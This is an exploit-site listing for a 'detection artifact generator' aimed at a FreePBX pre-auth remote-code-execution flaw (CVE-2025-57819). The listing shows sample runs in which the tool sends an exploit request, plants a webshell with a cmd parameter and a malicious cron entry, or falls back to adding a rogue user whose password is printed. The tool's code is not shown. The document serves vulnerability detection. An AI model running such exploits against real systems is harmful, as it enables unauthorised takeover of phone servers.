Share
## https://sploitus.com/exploit?id=081B2653-51E4-5978-9D40-A8DE83DA2069
# CVE-2025-57819 FreePBX Pre-Auth RCE
FreePBX Pre-Auth RCE 1day Detection Artifact Generator Tool
# Detection in Action
Detection Artifact Generator attempts to upload the php script or adds a new user if the upload fails.
```
$ python3 watchTowr-vs-FreePBX-CVE-2025-57819.py -H http://freepbx.lab.local
__ ___ ___________
__ _ ______ _/ |__ ____ | |_\__ ____\____ _ ________
\ \/ \/ \__ \ ___/ ___\| | \| | / _ \ \/ \/ \_ __ \
\ / / __ \| | \ \___| Y | |( \ / | | \/
\/\_/ (____ |__| \___ |___|__|__ | \__ / \/\_/ |__|
\/ \/ \/
watchTowr-vs-FreePBX-CVE-2025-57819.py
(*) CVE-2025-57819 Detection Artifact Generator: FreePBX Auth Bypass + SQL Injection to RCE
- Piotr and Sonny of watchTowr
[+] FreePBX CVE-2025-57819 Detection Artifact Generator started
[+] Sending exploit request
[+] Waiting 2 minutes for DAG script to be created
[+] VULNERABLE - webshell found: http://freepbx.lab.local/this-is-an-ioc-not-actually-watchTowr-pd3o125j59.php?cmd=hostname
[+] Cleaning.sh malicious cron_job - please confirm manually that there is no malicious entries in asterisk.cron_jobs table
```
If php script upload fails, it'll fallback to the user-based detection. It adds a "random" username with "random" 12 character password.
```
$ python3 watchTowr-vs-FreePBX-CVE-2025-57819.py -H http://freepbx.lab.local
__ ___ ___________
__ _ ______ _/ |__ ____ | |_\__ ____\____ _ ________
\ \/ \/ \__ \ ___/ ___\| | \| | / _ \ \/ \/ \_ __ \
\ / / __ \| | \ \___| Y | |( \ / | | \/
\/\_/ (____ |__| \___ |___|__|__ | \__ / \/\_/ |__|
\/ \/ \/
watchTowr-vs-FreePBX-CVE-2025-57819.py
(*) CVE-2025-57819 Detection Artifact Generator: FreePBX Auth Bypass + SQL Injection to RCE
- Piotr and Sonny of watchTowr
[+] FreePBX CVE-2025-57819 Detection Artifact Generator started
[+] Sending exploit request
[+] Waiting 2 minutes for DAG script to be created
[-] Webshell not found - falling back to user adding
[+] Adding user: watchTowrm0njzhj0ii / CdEf2DWGpT8u
[+] Verifying if user exists
[+] VULNERABLE: user added
```
# Description
This script attempts to detect if FreePBX is vulnerable to CVE-2025-57819 Pre-Auth RCE.
# Affected Versions
`< 15.0.66`
`< 16.0.89`
`< 17.0.3`
# Follow [watchTowr](https://watchTowr.com) Labs
For the latest security research follow the [watchTowr](https://watchTowr.com) Labs Team
- https://labs.watchtowr.com/
- https://x.com/watchtowrcyber